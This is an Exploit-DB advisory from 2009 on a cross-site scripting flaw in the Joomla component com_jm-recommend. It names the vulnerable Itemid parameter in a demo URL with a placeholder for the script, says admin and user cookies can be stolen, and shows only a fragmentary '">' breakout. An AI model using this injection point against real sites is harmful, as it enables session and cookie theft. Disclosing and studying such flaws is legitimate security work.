com_jm-recommend - Cross-Site Scripting

EDB-ID:

10735

CVE:

N/A


Author:

Pyske

Type:

webapps


Platform:

PHP

Date:

2009-12-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: com_jm-recommend Cross Site Scripting Vulnerabilities
# Date: 27:12:2009
# Author: Pyske

###########################################################################

Joomla Component com_jm-recommend Cross Site Scripting Vulnerabilities
###########################################################################

# Author : Pyske
# Name : com_jm-recommend
# Home : www.cyber-warrior.org
# Greetz : Fl0riX , M-K-A , F0RTS3V3N , 3KB3R and ALL Cyber-Warrior

# Bug Type : Cross Site Scripting
# Infection : Yönetici ve User cookiekleri calinabilir.
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.

# Demo Vuln. : http://server/index.php?option=com_jm-recommend&Itemid= [XSS CODE]


# Example : http://server/index.php?option=com_jm-recommend&Itemid= [ XSS Code ]

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >


">


< -- bug code end of -- >